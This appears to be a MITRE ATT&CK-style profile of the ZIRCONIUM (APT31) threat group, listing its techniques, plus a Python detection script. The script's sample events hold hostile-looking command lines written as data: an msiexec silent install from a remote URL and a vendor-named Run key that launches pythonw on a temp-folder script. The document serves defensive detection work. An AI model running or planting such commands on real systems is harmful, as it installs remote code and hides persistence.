
G0128 ZIRCONIUM

ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.[1][2]

Item Value
ID G0128
Associated Names APT31
Version 1.1
Created 24 March 2021
Last Modified 22 March 2023

Associated Group Descriptions

Name Description
APT31 [2]

Techniques Used

Domain ID Name Use
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains ZIRCONIUM has purchased domains for use in targeted campaigns.[1]
enterprise T1583.006 Web Services ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.[4][3]
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary.[3]
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.003 Windows Command Shell ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host.[3]
enterprise T1059.006 Python ZIRCONIUM has used Python-based implants to interact with compromised hosts.[4][3]
enterprise T1555 Credentials from Password Stores -
enterprise T1555.003 Credentials from Web Browsers ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.[3]
enterprise T1140 Deobfuscate/Decode Files or Information ZIRCONIUM has used the AES256 algorithm with a SHA1-derived key to decrypt exploit code.[2]
enterprise T1573 Encrypted Channel -
enterprise T1573.001 Symmetric Cryptography ZIRCONIUM has used AES-encrypted communications in C2.[3]
enterprise T1041 Exfiltration Over C2 Channel ZIRCONIUM has exfiltrated files via the Dropbox API C2.[3]
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage ZIRCONIUM has exfiltrated stolen data to Dropbox.[3]
enterprise T1068 Exploitation for Privilege Escalation ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.[2]
enterprise T1105 Ingress Tool Transfer ZIRCONIUM has used tools to download malicious files to compromised hosts.[3]
enterprise T1036 Masquerading ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.[4][3]
enterprise T1036.004 Masquerade Task or Service ZIRCONIUM has created a Run key named Dropbox Update Setup to mask a persistence mechanism for a malicious binary.[3]
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing ZIRCONIUM has used multi-stage packers for exploit code.[2]
enterprise T1566 Phishing -
enterprise T1566.002 Spearphishing Link ZIRCONIUM has used malicious links in e-mails to deliver malware.[1][4][3]
enterprise T1598 Phishing for Information ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.[4]
enterprise T1598.003 Spearphishing Link ZIRCONIUM has used web beacons in e-mails to track hits to attacker-controlled URLs.[1]
enterprise T1012 Query Registry ZIRCONIUM has used a tool to query the Registry for proxy settings.[3]
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.007 Msiexec ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files.[3]
enterprise T1082 System Information Discovery ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.[3]
enterprise T1016 System Network Configuration Discovery ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.[3]
enterprise T1033 System Owner/User Discovery ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.[3]
enterprise T1124 System Time Discovery ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.[3]
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.[4][3]
enterprise T1102 Web Service -
enterprise T1102.002 Bidirectional Communication ZIRCONIUM has used Dropbox for C2, allowing upload and download of files as well as execution of arbitrary commands.[4][3]
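Several rows in the table describe host behaviour that a detection engineer can turn directly into rules: a Run key whose value name borrows a vendor brand but launches a script interpreter (T1547.001 with T1036.004), msiexec.exe installing a package from a URL (T1218.007), and a process other than the Dropbox client reaching the Dropbox API (T1102.002 and T1041). The Python block below is an added example, not MITRE's code and not code from the cited reports. It runs those three rules over constructed Sysmon-style events; every path, hostname, IP and the allowlist of Dropbox client binaries are assumptions for illustration.

```python
"""Three detection rules for ZIRCONIUM behaviours from the table above, run over
constructed Sysmon-style events. Added example; not MITRE's code and not code
from the cited reports. Paths, hostnames, the IP and the allowlist are assumed."""
import re

# Script interpreters that a legitimate vendor updater's Run key would not launch.
INTERPRETER_RE = re.compile(r"\\(pythonw?|wscript|cscript|mshta|powershell)\.exe\b", re.I)
# Scratch directories a real updater does not live in.
USER_WRITABLE = ("\\temp\\", "\\downloads\\", "\\public\\")
# Brands commonly borrowed for masquerading (T1036.004); extend per environment.
VENDOR_NAMES = ("dropbox", "google", "adobe", "microsoft", "onedrive")
# Assumed allowlist: Dropbox client binaries and browsers expected to reach Dropbox.
DROPBOX_ALLOWED = {"dropbox.exe", "dropboxupdate.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
DROPBOX_HOSTS = ("dropbox.com", "dropboxapi.com")

# Constructed (hypothetical) events in Sysmon-like shape: registry set (EID 13),
# process create (EID 1) and network connect (EID 3). One benign twin per rule.
SAMPLE_EVENTS = [
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Dropbox Update Setup",
     "data": r"C:\Users\victim\AppData\Local\Temp\pythonw.exe C:\Users\victim\AppData\Local\Temp\svc.py"},
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Dropbox Update",
     "data": r"C:\Users\victim\AppData\Roaming\Dropbox\Update\DropboxUpdate.exe /c"},
    {"type": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /q /i http://203.0.113.10/update.msi"},
    {"type": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Users\victim\Downloads\7z2201-x64.msi"},
    {"type": "network_connect", "image": r"C:\Users\victim\AppData\Local\Temp\pythonw.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
    {"type": "network_connect", "image": r"C:\Program Files (x86)\Dropbox\Client\Dropbox.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
]


def _basename(path):
    """Last path component, lower-cased, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_run_key_masquerade(ev):
    """T1547.001 + T1036.004: vendor-named Run key that launches a script interpreter
    or a binary in a user-writable scratch directory."""
    if ev["type"] != "registry_set" or not ev["key"].lower().endswith("\\run"):
        return None
    name, data = ev["value_name"].lower(), ev["data"].lower()
    if not any(v in name for v in VENDOR_NAMES):
        return None
    if INTERPRETER_RE.search(data) or any(d in data for d in USER_WRITABLE):
        return {"rule": "run_key_masquerade", "detail": f"{ev['value_name']!r} -> {ev['data']}"}
    return None


def rule_msiexec_remote(ev):
    """T1218.007: msiexec.exe pulling the package from a URL instead of a local path."""
    if ev["type"] != "process_create" or _basename(ev["image"]) != "msiexec.exe":
        return None
    if re.search(r"https?://", ev["command_line"], re.I):
        return {"rule": "msiexec_remote_install", "detail": ev["command_line"]}
    return None


def rule_cloud_c2(ev):
    """T1102.002 / T1041: Dropbox endpoint reached by a process outside the allowlist."""
    if ev["type"] != "network_connect":
        return None
    host = ev["dest_host"].lower()
    if host not in DROPBOX_HOSTS and not host.endswith(tuple("." + h for h in DROPBOX_HOSTS)):
        return None
    if _basename(ev["image"]) in DROPBOX_ALLOWED:
        return None
    return {"rule": "cloud_service_c2", "detail": f"{ev['image']} -> {host}:{ev['dest_port']}"}


RULES = (rule_run_key_masquerade, rule_msiexec_remote, rule_cloud_c2)


def run_rules(events):
    """Apply every rule to every event; return alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['detail']}")
```

Each rule is paired with a benign twin in the sample data so the tuning is visible: the genuine DropboxUpdate.exe entry under the Dropbox profile directory is not flagged, a local MSI install is not flagged, and the real Dropbox client talking to the API is not flagged. In production the allowlist and brand list would come from the environment's software inventory rather than the constants above.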

References